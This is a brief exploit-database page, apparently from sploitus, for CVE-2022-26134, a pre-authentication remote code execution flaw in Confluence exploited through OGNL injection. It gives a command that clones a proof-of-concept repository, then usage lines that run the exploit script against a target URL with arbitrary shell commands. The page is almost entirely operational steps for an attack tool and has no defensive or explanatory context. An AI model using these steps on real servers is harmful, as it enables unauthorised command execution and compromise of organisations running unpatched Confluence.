Share
## https://sploitus.com/exploit?id=28E888C4-78E3-5F8D-B316-AB42FED892F9
# CVE-2022-26134
CVE-2022-26134 - Confluence Pre-Auth RCE | OGNL injection

- Download PoC script

```
git clone https://github.com/crowsec-edtech/CVE-2022-26134
cd CVE-2022-26134
```

- Run exploit

```
USE: python3 exploit.py https://target.com CMD
Ex: python3 exploit.py https://target.com id
Ex: python3 exploit.py https://target.com 'ls -la'

```